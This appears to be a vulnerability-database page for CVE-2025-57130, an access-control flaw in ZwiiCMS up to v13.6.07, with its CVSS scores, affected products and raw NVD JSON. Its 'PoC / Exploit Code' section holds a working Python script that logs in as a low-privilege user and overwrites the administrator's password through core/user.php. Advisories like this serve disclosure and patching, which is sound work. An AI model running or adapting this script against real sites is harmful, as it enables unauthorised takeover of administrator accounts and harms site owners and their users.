Security Vulnerability Report
中文
CVE-2025-57130 CVSS 8.3 HIGH

CVE-2025-57130

Published: 2025-11-05 16:15:40
Last Modified: 2026-02-02 16:32:11

Description

An Incorrect Access Control vulnerability in the user management component of ZwiiCMS up to v13.6.07 allows a remote, authenticated attacker to escalate their privileges. By sending a specially crafted HTTP request, a low-privilege user can access and modify the profile data of any other user, including administrators.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:zwiicms:zwiicms:*:*:*:*:*:*:*:* - VULNERABLE
ZwiiCMS <= v13.6.07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re TARGET_URL = "http://target-zwiicms.com" ATTACKER_USERNAME = "low_privilege_user" ATTACKER_PASSWORD = "password123" TARGET_USER_ID = 1 # Usually admin session = requests.Session() # Step 1: Login as low privilege user login_data = { "username": ATTACKER_USERNAME, "password": ATTACKER_PASSWORD } response = session.post(f"{TARGET_URL}/core/user.php", data=login_data) # Step 2: Get valid session and user page profile_url = f"{TARGET_URL}/core/user.php?id={TARGET_USER_ID}" response = session.get(profile_url) # Step 3: Extract CSRF token if present # csrf_token = re.search(r'name="csrf_token" value="([^"]+)"', response.text) # Step 4: Modify target user profile modify_data = { "id": TARGET_USER_ID, "user": "admin", "password": "NewP@ssw0rd123!", # New admin password "mail": "[email protected]" # Add other fields as needed } response = session.post(f"{TARGET_URL}/core/user.php", data=modify_data) if response.status_code == 200: print("[+] Privilege Escalation Successful!") print("[+] Admin password changed to: NewP@ssw0rd123!") else: print("[-] Exploitation failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57130", "sourceIdentifier": "[email protected]", "published": "2025-11-05T16:15:40.203", "lastModified": "2026-02-02T16:32:11.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability in the user management component of ZwiiCMS up to v13.6.07 allows a remote, authenticated attacker to escalate their privileges. By sending a specially crafted HTTP request, a low-privilege user can access and modify the profile data of any other user, including administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zwiicms:zwiicms:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.6.07", "matchCriteriaId": "5FE3AA50-5558-450B-ADF7-E28D6C26E138"}]}]}], "references": [{"url": "http://zwiicms.com", "source": "[email protected]", "tags": ["Product", "Broken Link"]}, {"url": "https://blog.nivel4.com/noticias/cve-2025-57130-especialistas-de-nivel4-identifican-falla-de-alta-severidad-en-gestor-de-contenidos", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}